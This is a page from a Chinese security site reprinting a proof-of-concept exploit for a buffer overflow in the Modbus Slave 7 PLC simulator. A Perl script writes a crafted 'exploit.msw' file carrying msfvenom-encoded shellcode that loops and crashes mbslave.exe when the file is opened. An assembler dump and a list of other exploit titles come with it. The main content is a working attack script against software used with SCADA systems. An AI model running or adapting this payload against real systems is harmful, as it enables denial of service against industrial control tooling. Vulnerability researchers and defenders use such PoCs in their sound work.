首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Modbus Slave PLC 7 - '.msw' Buffer Overflow (PoC)
来源:vfocus.net 作者:Çapar 发布时间:2018-10-30  
# Exploit Title: Modbus Slave PLC 7 - '.msw' Buffer Overflow (PoC)
# Author: Kağan Çapar
# Discovery Date: 2018-10-27
# Software Link: https://www.modbustools.com/download/ModbusSlaveSetup32Bit.exe
# Vendor Homepage : https://www.modbustools.com
# Tested Version: 7
# Tested on OS: Windows XP SP3 *ENG
# other version should be affected
# About software : Modbus Slave is for simulating up to 32 slave devices in 32 windows!.
# Speed up your PLC programming with this simulating tools.  Used for SCADA systems.
# Modbus is a serial communications protocol originally published by Schneider Electric
# Steps to Reproduce: Run the perl exploit script, it will create a new
# file with the name "exploit.msw" and Drag on to "mbslave.exe"
# you will see a loop and crash on software
# Greetz : cwd-onkan-badko-key-akkus
 
# ! /usr/bin/perl
 
# Dump of assembler code for function loop:
# 0x0000555555558030 <+0>:    mov    $0x1e3b563c,%ebx
# 0x0000555555558035 <+5>:    fld    %st(4)
# 0x0000555555558037 <+7>:    fnstenv -0xc(%rsp)
# 0x000055555555803b <+11>:   pop    %rax
# 0x000055555555803c <+12>:   sub    %ecx,%ecx
# 0x000055555555803e <+14>:   mov    $0x1,%cl
# 0x0000555555558040 <+16>:   xor    %ebx,0x14(%rax)
# 0x0000555555558043 <+19>:   add    $0x4,%eax
# 0x0000555555558046 <+22>:   add    0x10(%rax),%ebx
# 0x0000555555558049 <+25>:   fisubs 0xe0d0(%rbx)
 
# msfvenom -p generic/tight_loop --platform windows_86 -f perl -e x86/shikata_ga_nai
# print /x &loop
# $1 = 0x555555558030
 
open(code, ">exploit.msw");
binmode(code);
$loop =
"\xbb\x3c\x56\x3b\x1e\xd9\xc4\xd9\x74\x24\xf4\x58\x2b\xc9" .
"\xb1\x01\x31\x58\x14\x83\xc0\x04\x03\x58\x10\xde\xa3\xd0" .
"\xe0";
 
print code $loop;
close(code);
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·AlienIP 2.41 - Denial of Servi
·Local Server 1.0.9 - Denial of
·Navicat 12.0.29 - 'SSH' Denial
·Paramiko 2.4.1 - Authenticatio
·Linux mremap() TLB Flush Too L
·Modbus Slave 7.0.0 - Denial of
·WordPress Arforms 3.5.1 Arbitr
·Microsoft Windows 10 User Sess
·ASRock Drivers Privilege Escal
·R 3.4.4 (Windows 10 x64) - Buf
·Linux systemd Symlink Derefere
·xorg-x11-server 1.20.3 - Privi
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved